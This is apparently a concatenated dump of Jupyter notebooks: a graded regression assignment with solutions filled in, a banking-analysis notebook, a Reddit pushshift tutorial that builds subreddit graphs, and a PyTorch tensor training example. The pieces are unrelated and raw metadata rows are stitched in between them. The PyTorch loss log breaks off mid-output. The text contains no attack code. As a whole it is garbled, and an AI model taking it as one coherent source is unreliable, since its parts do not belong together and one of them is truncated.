"_____no_output_____" ] ], [ [ "## Defining the linear model [1 pt]\n\nNow we are going to try to find the function which best relates these points. We will start by fitting a simple linear function of the form\n\n(2.15) $$g(x) = w_1x + w_0$$\n\n*For more detailed description of linear regression, watch Andrew's videos on the topic. The notation is slightly different, $y$ instead of $r$ for the output, and $\\theta$ instead of $w$ for the model parameters, but the actual model is identical.*", "_____no_output_____" ] ], [ [ "display(YouTubeVideo('ls7Ke48jCt8'))\ndisplay(YouTubeVideo('PBZUjnGuXjA'))", "_____no_output_____" ] ], [ [ "Now write a function that computes the predicted output value $g(x)$ given a value of $x$ and the parameters $w_0$ and $w_1$. This should be very straightforward, but make sure you understand what part this plays in our supervised learning problem before moving on.", "_____no_output_____" ] ], [ [ "def linear_model(w0, w1, x):\n # YOUR SOLUTION HERE\n return w0+w1*x", "_____no_output_____" ] ], [ [ "## Creating the cost function [2 pt]\n\nThe cost function is defined as the sum of the squared errors of each prediction\n\n(2.16) $$E(w_1, w_0|X) = \\frac{1}{N}\\sum^N_{t=1} [r^t - (w_1x^t + w_0)]^2$$\n\n*These videos are great for building intuition on the relation between the hypothesis function and the associated cost of that hypothesis for the data.*", "_____no_output_____" ] ], [ [ "display(YouTubeVideo('EANr4YttXIQ'))\ndisplay(YouTubeVideo('J5vJFwQWOaY'))", "_____no_output_____" ] ], [ [ "Write a function to compute the cost based on the dataset $X$, $R$ and parameters $w_0$ and $w_1$. Based on your plot of the data, try to estimate some sensible values for $w_0$ and $w_1$ and compute the corresponding cost. Try at least 3 different guesses and print their cost. 
Order the prints of your guesses from highest to lowest cost.", "_____no_output_____" ] ], [ [ "def linear_cost(w0, w1, X, R):\n # YOUR SOLUTION HERE\n return np.sum((w0+w1*X-R)**2)/len(R)", "_____no_output_____" ], [ "# Guess 1 w0=-200, w1=100\nprint(linear_cost(-200, 100, X, R))\n# Guess 2 w0=-100, w1=10\nprint(linear_cost(-100, 10, X, R))\n# Guess 3 w0=0, w1=0\nprint(linear_cost(0, 0, X, R))", "125813.8834593852\n74055.22824945165\n55279.41576950028\n" ] ], [ [ "## Fitting the linear model [4 pt]\n\nWe can find the minimum value of the cost function by taking the partial derivatives of that cost function for both of the weights $w_0$ and $w_1$ and setting them equal to $0$, resulting in the equations\n\n(2.17a) $$w_1 = \\frac{\\sum_tx^tr^t - \\bar{x}\\bar{r}N}{\\sum_t(x^t)^2 - N\\bar{x}^2}$$\n(2.17b) $$w_0 = \\bar{r} - w_1\\bar{x}$$\n\nYou can compute the partial derivates of equation *2.16* yourself and set them both equal to zero, to check you understand where these two equations come from. Minimizing the cost function gives us the best possible parameters for a linear model predicting the values of the provided dataset. *Note:* If you are unfamiliar with the notation $\\bar{x}$, it is defined in *Alpaydin* too, below equation *2.17*.\n\nWrite a function which computes the optimal values of $w_0$ and $w_1$ for a dataset consisting of the vectors $X$ and $R$, containing $N$ elements each. Use *matplotlib* again to plot the points, but now also add the line representing the hypothesis function you found. As the line is linear, you can simply plot it by computing the 2 end points and have *matplotlib* draw the connecting line.\n\nNote that with some clever [array operations](https://docs.scipy.org/doc/numpy/reference/routines.array-manipulation.html) and [linear algebra](https://docs.scipy.org/doc/numpy/reference/routines.linalg.html) you can avoid explicitly looping over all the elements in $X$ and $R$ in `linear_fit`, which will make you code a lot faster. However, this is just an optional extra and any working implementation of the equations above will be considered correct.", "_____no_output_____" ] ], [ [ "def linear_fit(X, R, N):\n # YOUR SOLUTION HERE\n xbar = np.mean(X)\n rbar = np.mean(R)\n w1 = (np.sum(X*R) - xbar*rbar*N) / (np.sum(X**2) - N*xbar**2)\n w0 = rbar - w1*xbar\n return w0,w1\n# YOUR SOLUTION HERE\nplt.scatter(X, R)\nw0,w1 = linear_fit(X, R, len(R))\ny1 = linear_model(w0, w1, -5)\ny2 = linear_model(w0, w1, 5)\nplt.plot([-5,5], [y1,y2])\nplt.show()", "_____no_output_____" ] ], [ [ "## Polynomial data [3 pt]\n\nThe linear model can easily be extended to polynomials of any order by expanding the original input with the squared input $x^2$, the cubed input $x^3$, etc and adding additional weights to the model. For ease of calculation, the input is also expanded with a vector of $1$'s, to represent the input for the constant parameter $w_0$. 
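As a quick illustration (with made-up numbers): a single input $x = 2$ expanded up to order $k = 3$ would give the row $[1, 2, 4, 8]$, i.e. $[x^0, x^1, x^2, x^3]$. 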
The parameters then become $w_0$, $w_1$, $w_2$, etc., one factor for each term of the polynomial.\n\nSo if originally the dataset of $N$ elements is of the form $X$ (superscripts are indices here)\n\n$$ X = \\left[\\begin{array}{c} x^1 \\\\ x^2 \\\\ \\vdots \\\\ x^N \\end{array} \\right]$$\n\nThen the matrix $D$ for a $k^{th}$-order polynomial becomes\n\n$$ D = \\left[\\begin{array}{cccc}\n1 & x^1 & (x^1)^2 & \\cdots & (x^1)^k \\\\ \n1 & x^2 & (x^2)^2 & \\cdots & (x^2)^k \\\\ \n\\vdots \\\\\n1 & x^N & (x^N)^2 & \\cdots & (x^N)^k \\\\ \n\\end{array} \\right]$$\n\nWrite a function `create_D_matrix` that constructs this matrix for a given vector $X$ up the specified order $k$. Looking at plots for the dataset we have been using so far, the relationship between the points will probably be at least be quadratic. Use the function to construct a matrix $D$ of order $2$, print the matrix and verify that it looks correct.", "_____no_output_____" ] ], [ [ "def create_D_matrix(X, k):\n # YOUR SOLUTION HERE\n return np.array([X.reshape(len(X),)**i for i in range(k+1)]).T\nD = create_D_matrix(X, 2)", "_____no_output_____" ] ], [ [ "## Polynomial model [2 pt]\n\nThe parameters can now be represented as\n\n$$ w = \\left[\\begin{array}{c} w_0 \\\\ w_1 \\\\ \\vdots \\\\ w_k \\end{array} \\right]$$\n\nThe hypothesis for a single input then just becomes\n\n$$ g(x^1) = \\sum_{i=0}^k D^1_iw_i $$\n\nWhich can write as a matrix multiplication for all inputs in a single equation\n\n$$ \\left[\\begin{array}{cccc}\n1 & x^1 & (x^1)^2 & \\cdots & (x^1)^k \\\\ \n1 & x^2 & (x^2)^2 & \\cdots & (x^2)^k \\\\ \n\\vdots \\\\\n1 & x^N & (x^N)^2 & \\cdots & (x^N)^k \\\\ \n\\end{array} \\right]\n\\left[\\begin{array}{c} w_0 \\\\ w_1 \\\\ \\vdots \\\\ w_k \\end{array} \\right] = \\left[\\begin{array}{c} g(x^1) \\\\ g(x^2) \\\\ \\vdots \\\\ g(x^N) \\end{array} \\right]$$\n\nYou can do matrix multiplication using the [dot](https://docs.scipy.org/doc/numpy/reference/generated/numpy.dot.html) function. Write 2 functions for computing the polynomial below\n\n* `poly_val` should take a single input value $x$ and a vector of polynomial weights $W$ and compute the single hypothesis value for that input. We can use this function later to show the polynomial that we have fitted (just like the function `linear_model`).\n* `poly_model` should take a matrix $D$ and weight vector $W$ and compute the corresponding vector of hypotheses. ", "_____no_output_____" ] ], [ [ "def poly_val(x, W):\n # YOUR SOLUTION HERE\n return np.dot(np.array([x**i for i in range(len(W))]),W)\ndef poly_model(D, W):\n # YOUR SOLUTION HERE\n return np.dot(D, W)", "_____no_output_____" ] ], [ [ "## Polynomial cost function and model fitting [3 pts]\n\nAnd for the cost function we can now use\n\n$$ E(w|X) = \\frac{1}{2N} \\sum_{t=1}^N [r^t - D^tw]^2$$\n\nHere, we compute the hypothesis $g(x)$ for every example using $D^tw$, take the difference with the actual output $r$ and finally square and sum each difference. Note that this is extremely similar to the mean squared error function we used for the linear case, and also that minimizing this error function is actually equivalent to maximizing the log likelihood of the parameter vector $w$ (see equations $4.31$ and $4.32$).\n\nNow we have the cost function equation and can again take the partial derivative for each of the weights $w_0$ to $w_k$ and set their value equal to $0$. Solving the resulting system of equations will give the set of weights that minimize the cost function. 
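If you want to check your own derivation, the matrix form is a compact way to do it: writing the cost as $E(w) = \\frac{1}{2N}(r - Dw)^T(r - Dw)$, its gradient with respect to $w$ is $-\\frac{1}{N}D^T(r - Dw)$, and setting this to zero gives the normal equations $D^TDw = D^Tr$, which is exactly what equation 4.33 below solves for $w$. 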
The weights describing this lowest point of the cost function are the parameters which will produce the line that best fits our dataset.\n\nSolving all partial derivate equations for each weight can actually be done with just a couple of matrix operations. Deriving the equation yourself can be a bit involved, but know that the principle is exactly the same as for the linear model computing just $w_0$ and $w_1$. The final equation for weight vector becomes\n\n(4.33) $$ w = (D^TD)^{-1}D^Tr $$\n\nNumpy has built in functions for [transpose](https://docs.scipy.org/doc/numpy/reference/generated/numpy.transpose.html) and [inverse](https://docs.scipy.org/doc/numpy/reference/generated/numpy.linalg.inv.html). Use them to write the code for the following functions.\n\n* `poly_cost` should return the total cost $E$ given $w$, $D$ and $r$. We can use this to see how good a fit is.\n* `poly_fit` should return the vector $w$ that bests fits the polynomial relationship between matrix $D$ and vector $r$\n\nUsing the quadratic matrix $D$ you constructed earlier and this `poly_fit` function, find the best fitting weights for a quadric polynomial on the data and print these weights\n", "_____no_output_____" ] ], [ [ "def poly_cost(W, D, R):\n # YOUR SOLUTION HERE\n return np.sum((R - np.dot(D,W))**2) / (2*len(R))\ndef poly_fit(D, R): \n # YOUR SOLUTION HERE\n return np.dot(np.dot(inv(np.dot(np.transpose(D),D)),np.transpose(D)),R)\n# YOUR SOLUTION HERE\nW = poly_fit(D, R)\nprint(W)", "[[-56.87348684]\n [ 52.14107002]\n [ 16.02439317]]\n" ] ], [ [ "## Plotting polynomials [1 pt]\n\nNow lets try and figure out what our fitted quadratic polynomial looks like. As the function is not linear, we will need more than just 2 points to actually plot the line. The easiest solution is to create a whole bunch of x-values as samples, compute the corresponding y-values and plot those. With enough samples the line will look smooth, even if it is connected with linear segments.\n\nTo create these x-values samples, we can use the function [linspace](https://docs.scipy.org/doc/numpy/reference/generated/numpy.linspace.html). Then just use the `poly_val` function you wrote earlier and apply it to every x-value to compute the array of y-values. Now just plot the original datapoints as dots and the hypothesis as a line, just as for the linear plot. Don't forget to show your plot at the end.\n\nUse these steps to fill in the `poly_plot` function below and show the polynomial function defined by the weights you found for the quadratic polynomial.", "_____no_output_____" ] ], [ [ "def poly_plot(W, X, R):\n # YOUR SOLUTION HERE\n x = np.linspace(-5,5,100)\n y = [poly_val(xi, W) for xi in x]\n plt.scatter(X,R)\n plt.plot(x, y)\n plt.show()\npoly_plot(W, X, R)", "_____no_output_____" ] ], [ [ "## Polynomial order [1 pt]\n\nYou can now create a polynomial fit on the data for a polynomial of any order. The next question then becomes: *What order polynomial fits the data the best?*\n\nUsing the `create_D_matrix`, `poly_fit` and `poly_plot`, try to fit different order polynomials to the data. Show the plot for the order polynomial you think fits best.\n\nNote that the cost function will most likely decrease with each added polynomial term, as there is more flexibility in the model to fit the data points exactly. However, these weights will fit those few data points very well, but might have very extreme values in between points that would not be good predictors for new inputs. 
Something like an order 20 polynomial might have a very well fitting shape for the existing data points, but looks like it would be strange predictor at some of the possible other points. Try to find a fit that looks visually like it would generalize well to new points.\n", "_____no_output_____" ] ], [ [ "# YOUR SOLUTION HERE\nD = create_D_matrix(X, 4)\nW = poly_fit(D, R)\npoly_plot(W, X, R)", "_____no_output_____" ] ], [ [ "## Cross validation [2 pt]\n\nAnother way to answer this same question is to use cross validation. With cross validation you split the data into 2 parts and use one part to fit the model (training set) and the other part to see how well the model fits the remaining data (validation set). This way, we can select a model that is less prone to overfitting. \n\nWrite a function below to split the original dataset into 2 sets according to a given ratio. It is important to randomize your division, as simply using the first half of data for the one set and the second half for the other, might result in a strange distribution. You could use a function like [shuffle](https://docs.scipy.org/doc/numpy/reference/generated/numpy.random.shuffle.html) for this purpose.\n\nSplit the original dataset using a ratio of 0.6 into a training and a validation set. Then for both of these sets, use your old `split_X_R` function to split them into their $X$ and $R$ parts", "_____no_output_____" ] ], [ [ "def validation_split(data, ratio):\n # YOUR SOLUTION HERE\n np.random.shuffle(data)\n n = int(ratio*len(data))\n training_set = data[:n, :]\n validation_set = data[n:, :]\n return training_set, validation_set\n# YOUR SOLUTION HERE\ntraining_set, validation_set = validation_split(data, 0.6)\ntrain_x, train_r = split_X_R(training_set)\nval_x, val_r = split_X_R(validation_set)", "_____no_output_____" ] ], [ [ "## Model selection [5 pt]\n\nWith this new split of the data you can just repeatedly fit different order polynomials to the training set and see which produces the lowest cost on the validation set. The set of weights with the lowests cost on the validation set generalizes the best to new data and is thus the best overal fit on the dataset. \n\nWrite the function `best_poly_fit` below. Try a large range of polynomial orders (like 1 to 50), create the $D$ matrix based on the training set for each order and fit the weights for that polynomial. Then for each of these found weights, also create the D matrix for the validation set and compute the cost using `poly_cost`. Return the set of weights with the lowest cost on the validation set and the corresponding cost.\n\nRun this fitting function with your training and validation sets. Plot the hypothesis function and show the weights that were found and what the cost was. Note that rerunning your validation split code above will result in a different random distribution and thus a slightly different final fit.", "_____no_output_____" ] ], [ [ "def best_poly_fit(train_x, train_r, val_x, val_r):\n # YOUR SOLUTION HERE\n lowest_cost = float('inf')\n best_w = 0\n for k in range(1,51):\n train_D = create_D_matrix(train_x, k)\n W = poly_fit(train_D, train_r)\n val_D = create_D_matrix(val_x, k)\n cost = poly_cost(W, val_D, val_r)\n if cost < lowest_cost:\n lowest_cost = cost\n best_w = W\n return best_w, lowest_cost\n# YOUR SOLUTION HERE\nbest_w, lowest_cost = best_poly_fit(train_x, train_r, val_x, val_r)\npoly_plot(best_w, X, R)\nprint('The weights are:\\n' +str(best_w)+'\\nThe cost is:\\n'+str(lowest_cost))", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ] ]
cb1f0aafd22d9c60fe1029b644bc98b9529e113f
3,012
ipynb
Jupyter Notebook
examples/userstory_1.ipynb
bajor/MoneyPy
8239059944810bf658ffa0664b2a83bdd640c8fa
[ "MIT" ]
null
null
null
examples/userstory_1.ipynb
bajor/MoneyPy
8239059944810bf658ffa0664b2a83bdd640c8fa
[ "MIT" ]
null
null
null
examples/userstory_1.ipynb
bajor/MoneyPy
8239059944810bf658ffa0664b2a83bdd640c8fa
[ "MIT" ]
null
null
null
22.992366
163
0.574369
[ [ [ "import moneypy", "_____no_output_____" ], [ "#specify the database to use\ndb = moneypy.select_db('./my_banking.db')\n# moneypy.select_last_db()", "_____no_output_____" ], [ "# Load and view existing data\ndb.as_frame().head(10) # Return a pandas dataframe. as_frame should allow you to specify what you want to load from the db to avoid loading huge files in memory ", "_____no_output_____" ], [ "# Load new data from a csv file\nnew_data = moneypy.from_csv('./my_banking_files.csv')\nnew_data.summarize() # Print how many entries, how many entries are unlabeled, ...", "_____no_output_____" ], [ "lablers = moneypy.get_default_lablers(db) # Get all label filters that are configured for a certain db\n\nfrom mylablers import MyLabler # Import a custom labler the user has written him/herself\n\nlablers.append(MyLabler)\nlabeled_data = new_data.label(MyLabler) # Add label and category automatically\n\nlabeled_data.head()", "_____no_output_____" ], [ "# Save the new data in the db\ndb.store(labeled_data) # Save the data and (somehow check if the entries already exist)\n\ndb.as_frame().head(10) # Show the new values loaded from the database", "_____no_output_____" ], [ "# get all entries related to food\nfood_filter = moneypy.RegexFilter('category', '^food$')\nfood_entrys = food_filter.apply(db)", "_____no_output_____" ], [ "food_entrys.plot.piechart('recipient') # create a piechart showing how much of your food money you have spent where", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code" ] ]
cb1f0b6bb26f172df788d533380a1a405b8c6d3f
11,736
ipynb
Jupyter Notebook
05_Reddit_Pushshift_API.ipynb
mizvol/GraphMining-TheWebConf2021
faed0e1aa181dc05f8eeee67fedf34ae73f428af
[ "MIT" ]
null
null
null
05_Reddit_Pushshift_API.ipynb
mizvol/GraphMining-TheWebConf2021
faed0e1aa181dc05f8eeee67fedf34ae73f428af
[ "MIT" ]
null
null
null
05_Reddit_Pushshift_API.ipynb
mizvol/GraphMining-TheWebConf2021
faed0e1aa181dc05f8eeee67fedf34ae73f428af
[ "MIT" ]
null
null
null
31.804878
378
0.576602
[ [ [ "# Exploring Reddit with the pushshift API\nThis notebook give you examples of how to use the pushshift API for querying Reddit data.\n\n* Pushshift doc: https://github.com/pushshift/api\n* FAQ about Pushshift: https://www.reddit.com/r/pushshift/comments/bcxguf/new_to_pushshift_read_this_faq/", "_____no_output_____" ] ], [ [ "import requests\nimport pandas as pd", "_____no_output_____" ] ], [ [ "We define a convenient function to get data from Pushshift:", "_____no_output_____" ] ], [ [ "def get_pushshift_data(data_type, params):\n \"\"\"\n Gets data from the pushshift api.\n \n data_type can be 'comment' or 'submission'\n The rest of the args are interpreted as payload.\n \n Read more: https://github.com/pushshift/api\n \n This function is inspired from:\n https://www.jcchouinard.com/how-to-use-reddit-api-with-python/\n \"\"\"\n \n base_url = f\"https://api.pushshift.io/reddit/search/{data_type}/\"\n request = requests.get(base_url, params=params)\n print('Query:')\n print(request.url)\n try: \n data = request.json().get(\"data\")\n except:\n print('--- Request failed ---')\n data = []\n return data\n", "_____no_output_____" ] ], [ [ "This function accepts the parameters of the pushshift API detailed in the doc at https://github.com/pushshift/api. An example is given below.", "_____no_output_____" ], [ "## Example of request to the API\nLet us collect the comments written in the last 2 day in the subreddit `askscience`. The number of results returned is limited to 100, the upper limit of the API.", "_____no_output_____" ] ], [ [ "# parameters for the pushshift API\ndata_type = \"comment\" # accept \"comment\" or \"submission\", search in comments or submissions\nparams = {\n \"subreddit\" : \"askscience\", # limit to one or a list of subreddit(s)\n \"after\" : \"2d\", # Select the timeframe. Epoch value or Integer + \"s,m,h,d\" (i.e. \"second\", \"minute\", \"hour\", \"day\")\n \"size\" : 100, # Number of results to return (limited to max 100 in the API)\n \"author\" : \"![deleted]\" # limit to a list of authors or ignore authors with a \"!\" mark in front\n}\n# Note: the option \"aggs\" (aggregate) has been de-activated in the API\n\ndata = get_pushshift_data(data_type, params)\ndf = pd.DataFrame.from_records(data)\nprint('Some of the data returned:')\ndf[['author', 'subreddit', 'score', 'created_utc', 'body']].head()", "_____no_output_____" ] ], [ [ "## Authors of comments\nLet us collect the authors of comments in a subreddit during the last days. The next function helps bypassing the limit of results by sending queries multiple times, avoiding collecting duplicate authors.", "_____no_output_____" ] ], [ [ "# Get the list of unique authors of comments in the API results\n# bypass the limit of 100 results by sending multiple queries\ndef get_unique_authors(n_results, params):\n results_per_request = 100 # default nb of results per query\n n_queries = n_results // results_per_request + 1\n author_list = []\n author_neg_list = [\"![deleted]\"]\n for query in range(n_queries):\n params[\"author\"] = author_neg_list\n data = get_pushshift_data(data_type=\"comment\", params=params)\n df = pd.DataFrame.from_records(data)\n if df.empty:\n return author_list\n authors = list(df['author'].unique())\n # add ! 
mark\n authors_neg = [\"!\"+ a for a in authors]\n author_list += authors\n author_neg_list += authors_neg\n return author_list", "_____no_output_____" ], [ "# Ask for the authors of comments in the last days, colect at least \"n_results\"\nsubreddit = \"askscience\"\ndata_type = \"comment\"\nparams = {\n \"subreddit\" : subreddit,\n \"after\" : \"2d\"\n}\nn_results = 500\nauthor_list = get_unique_authors(n_results, params)\nprint(\"Number of authors:\",len(author_list))", "_____no_output_____" ], [ "# Collect the subreddits where the authors wrote comments and the number of comments\nfrom collections import Counter\ndata_type = \"comment\"\nparams = {\n \"size\" : 100\n}\nsubreddits_count = Counter()\nfor author in author_list:\n params[\"author\"] = author\n print(params[\"author\"])\n data = get_pushshift_data(data_type=data_type, params=params)\n if data: # in case the resquest failed and data is empty\n df = pd.DataFrame.from_records(data)\n subreddits_count += Counter(dict(df['subreddit'].value_counts()))", "_____no_output_____" ] ], [ [ "## Network of subreddits (ego-graph)\nLet us build the ego-graph of the subreddit. Other subreddits will be connected to the main one if the users commented in the other subreddits as well.", "_____no_output_____" ] ], [ [ "# module for networks\nimport networkx as nx", "_____no_output_____" ], [ "threshold = 0.05\nG = nx.Graph()\nG.add_node(subreddit)\nself_refs = subreddits_count[subreddit]\nfor sub,value in subreddits_count.items():\n post_ratio = value/self_refs\n if post_ratio >= threshold:\n G.add_edge(subreddit,sub, weight=post_ratio)\nprint(\"Total number of edges in the graph:\",G.number_of_edges())", "_____no_output_____" ] ], [ [ "Here is an alternative way of generating the graph using pandas dataframes instead of a for loop (it might scale better on bigger graphs).", "_____no_output_____" ] ], [ [ "threshold = 0.05\nsubreddits_count_df = pd.DataFrame.from_dict(subreddits_count, orient='index', columns=['total'])\nsubreddits_ratio_df = subreddits_count_df/subreddits_count_df.loc[subreddit]\nsubreddits_ratio_df.rename(columns={'total': 'weight'}, inplace=True)\nfiltered_sr_df = subreddit_ratio_df[subreddits_ratio_df['weight'] >= threshold].copy() # filter weights < threshold\nfiltered_sr_df['source'] = subreddit\nfiltered_sr_df['target'] = filtered_sr_df.index\nGdf = nx.from_pandas_edgelist(filtered_sr_df, source='source', target='target', edge_attr=True)\nprint(\"Total number of edges in the graph:\",Gdf.number_of_edges())", "_____no_output_____" ], [ "# Write the graph to a file\npath = 'egograph.gexf'\nnx.write_gexf(G,path)", "_____no_output_____" ] ], [ [ "## Network of subreddit neighbors\nThis second collection makes a distinction between the related subreddits. For each author, all the subreddits where he/she commented will be connected together. The weight of each connection will be proportional to the number of users commenting in both subreddits joined by the connection. 
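For example (purely hypothetical numbers): if 12 of the sampled authors commented in both r/askscience and r/Physics, the edge between those two nodes ends up with weight 12. 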
The ego-graph becomes an approximate neighbor network for the central subreddit.", "_____no_output_____" ] ], [ [ "data_type = \"comment\"\nparams = {\n \"size\" : 100\n}\ncount_list = []\nfor author in author_list:\n params[\"author\"] = author\n print(params[\"author\"])\n data = get_pushshift_data(data_type=data_type, params=params)\n if data:\n df = pd.DataFrame.from_records(data)\n count_list.append(Counter(dict(df['subreddit'].value_counts())))", "_____no_output_____" ], [ "import itertools\nthreshold = 0.05\nG = nx.Graph()\n\nfor author_sub_count in count_list:\n sub_list = author_sub_count.most_common(10)\n # Compute all the combinations of subreddit pairs\n sub_combinations = list(itertools.combinations(sub_list, 2))\n for sub_pair in sub_combinations:\n node1 = sub_pair[0][0]\n node2 = sub_pair[1][0]\n if G.has_edge(node1, node2):\n G[node1][node2]['weight'] +=1\n else:\n G.add_edge(node1, node2, weight=1)\nprint(\"Total number of edges {}, and nodes {}\".format(G.number_of_edges(),G.number_of_nodes()))", "_____no_output_____" ], [ "# Sparsify the graph\nto_remove = [edge for edge in G.edges.data() if edge[2]['weight'] < 2]\nG.remove_edges_from(to_remove)", "_____no_output_____" ], [ "# Remove isolated nodes\nG.remove_nodes_from(list(nx.isolates(G)))\nprint(\"Total number of edges {}, and nodes {}\".format(G.number_of_edges(),G.number_of_nodes()))", "_____no_output_____" ], [ "# Write the graph to a file\npath = 'graph.gexf'\nnx.write_gexf(G,path)", "_____no_output_____" ] ], [ [ "An example of the graph visualization you can obtain using Gephi:\n![Reddit neighbors](figures/redditneighbors.png \"Reddit neighbors\")", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ] ]
cb1f1410472a52a82b6bad193bcb577c5f4266d1
20,566
ipynb
Jupyter Notebook
examples/2_two_layer_net_tensor.ipynb
spencerpomme/torchlight
254a461b30436ac23e64d5ce59e43a1672b76304
[ "MIT" ]
null
null
null
examples/2_two_layer_net_tensor.ipynb
spencerpomme/torchlight
254a461b30436ac23e64d5ce59e43a1672b76304
[ "MIT" ]
null
null
null
examples/2_two_layer_net_tensor.ipynb
spencerpomme/torchlight
254a461b30436ac23e64d5ce59e43a1672b76304
[ "MIT" ]
null
null
null
32.748408
87
0.603666
[ [ [ "%matplotlib inline", "_____no_output_____" ] ], [ [ "\nPyTorch: Tensors\n----------------\n\nA fully-connected ReLU network with one hidden layer and no biases, trained to\npredict y from x by minimizing squared Euclidean distance.\n\nThis implementation uses PyTorch tensors to manually compute the forward pass,\nloss, and backward pass.\n\nA PyTorch Tensor is basically the same as a numpy array: it does not know\nanything about deep learning or computational graphs or gradients, and is just\na generic n-dimensional array to be used for arbitrary numeric computation.\n\nThe biggest difference between a numpy array and a PyTorch Tensor is that\na PyTorch Tensor can run on either CPU or GPU. To run operations on the GPU,\njust cast the Tensor to a cuda datatype.\n\n", "_____no_output_____" ] ], [ [ "import torch\n\n\ndtype = torch.float\n# device = torch.device(\"cpu\")\ndevice = torch.device(\"cuda:1\") # Uncomment this to run on GPU\n\n# N is batch size; D_in is input dimension;\n# H is hidden dimension; D_out is output dimension.\nN, D_in, H, D_out = 64, 1000, 100, 10\n\n# Create random input and output data\nx = torch.randn(N, D_in, device=device, dtype=dtype)\ny = torch.randn(N, D_out, device=device, dtype=dtype)\n\n# Randomly initialize weights\nw1 = torch.randn(D_in, H, device=device, dtype=dtype)\nw2 = torch.randn(H, D_out, device=device, dtype=dtype)\n\nlearning_rate = 1e-6\nfor t in range(500):\n # Forward pass: compute predicted y\n h = x.mm(w1)\n h_relu = h.clamp(min=0)\n y_pred = h_relu.mm(w2)\n\n # Compute and print loss\n loss = (y_pred - y).pow(2).sum().item()\n print(t, loss)\n\n # Backprop to compute gradients of w1 and w2 with respect to loss\n grad_y_pred = 2.0 * (y_pred - y)\n grad_w2 = h_relu.t().mm(grad_y_pred)\n grad_h_relu = grad_y_pred.mm(w2.t())\n grad_h = grad_h_relu.clone()\n grad_h[h < 0] = 0\n grad_w1 = x.t().mm(grad_h)\n\n # Update weights using gradient descent\n w1 -= learning_rate * grad_w1\n w2 -= learning_rate * grad_w2", "0 29266960.0\n1 25477014.0\n2 27260208.0\n3 30241428.0\n4 30207164.0\n5 25019268.0\n6 16550626.0\n7 9194384.0\n8 4705195.0\n9 2503613.25\n10 1491022.125\n11 1013848.625\n12 764834.1875\n13 615944.9375\n14 514465.5625\n15 438525.125\n16 378407.875\n17 329093.71875\n18 287852.5\n19 252939.140625\n20 223106.5625\n21 197447.125\n22 175266.234375\n23 156014.3125\n24 139235.984375\n25 124555.3046875\n26 111688.09375\n27 100362.8203125\n28 90364.3828125\n29 81518.0703125\n30 73668.6640625\n31 66682.203125\n32 60449.52734375\n33 54883.21875\n34 49919.86328125\n35 45471.68359375\n36 41476.265625\n37 37879.41796875\n38 34634.4921875\n39 31704.412109375\n40 29053.955078125\n41 26653.27734375\n42 24475.0546875\n43 22497.203125\n44 20697.529296875\n45 19058.849609375\n46 17564.28515625\n47 16199.8564453125\n48 14952.7568359375\n49 13811.7900390625\n50 12768.75\n51 11813.8359375\n52 10937.40625\n53 10133.0517578125\n54 9393.5966796875\n55 8713.83984375\n56 8088.37890625\n57 7512.13037109375\n58 6980.56298828125\n59 6490.02099609375\n60 6037.01953125\n61 5618.40673828125\n62 5231.27001953125\n63 4872.9853515625\n64 4541.41748046875\n65 4234.21142578125\n66 3949.36328125\n67 3685.106201171875\n68 3439.8984375\n69 3212.32421875\n70 3000.765869140625\n71 2804.21484375\n72 2621.385498046875\n73 2451.32763671875\n74 2293.015625\n75 2145.6962890625\n76 2008.356689453125\n77 1880.4254150390625\n78 1761.308837890625\n79 1650.2481689453125\n80 1546.6138916015625\n81 1449.8695068359375\n82 1359.50732421875\n83 1275.093505859375\n84 1196.241455078125\n85 
1122.532958984375\n86 1053.6015625\n87 989.1404418945312\n88 928.8567504882812\n89 872.4309692382812\n90 819.725830078125\n91 770.4022827148438\n92 724.1859130859375\n93 680.8786010742188\n94 640.46484375\n95 602.6685791015625\n96 567.0758056640625\n97 533.6875\n98 502.3617858886719\n99 472.951416015625\n100 445.34490966796875\n101 419.4388427734375\n102 395.09442138671875\n103 372.2297058105469\n104 350.7359313964844\n105 330.5293273925781\n106 311.5328369140625\n107 293.66888427734375\n108 276.87176513671875\n109 261.0761413574219\n110 246.21310424804688\n111 232.2200469970703\n112 219.05177307128906\n113 206.65748596191406\n114 194.98643493652344\n115 183.99728393554688\n116 173.64747619628906\n117 163.89939880371094\n118 154.7146453857422\n119 146.0586395263672\n120 137.90000915527344\n121 130.21266174316406\n122 122.96631622314453\n123 116.13368225097656\n124 109.68746948242188\n125 103.61166381835938\n126 97.88236999511719\n127 92.476318359375\n128 87.3749771118164\n129 82.5643539428711\n130 78.02483367919922\n131 73.7400131225586\n132 69.69677734375\n133 65.87850952148438\n134 62.27714920043945\n135 58.875938415527344\n136 55.664085388183594\n137 52.62968826293945\n138 49.76548767089844\n139 47.059688568115234\n140 44.50413513183594\n141 42.089237213134766\n142 39.809329986572266\n143 37.65499496459961\n144 35.61928939819336\n145 33.69534683227539\n146 31.8774471282959\n147 30.1589412689209\n148 28.534767150878906\n149 26.999094009399414\n150 25.547992706298828\n151 24.17645835876465\n152 22.878679275512695\n153 21.6523494720459\n154 20.492351531982422\n155 19.396503448486328\n156 18.359289169311523\n157 17.378162384033203\n158 16.450359344482422\n159 15.573212623596191\n160 14.74298095703125\n161 13.957356452941895\n162 13.214544296264648\n163 12.511799812316895\n164 11.846867561340332\n165 11.217629432678223\n166 10.622474670410156\n167 10.059125900268555\n168 9.525788307189941\n169 9.020942687988281\n170 8.543808937072754\n171 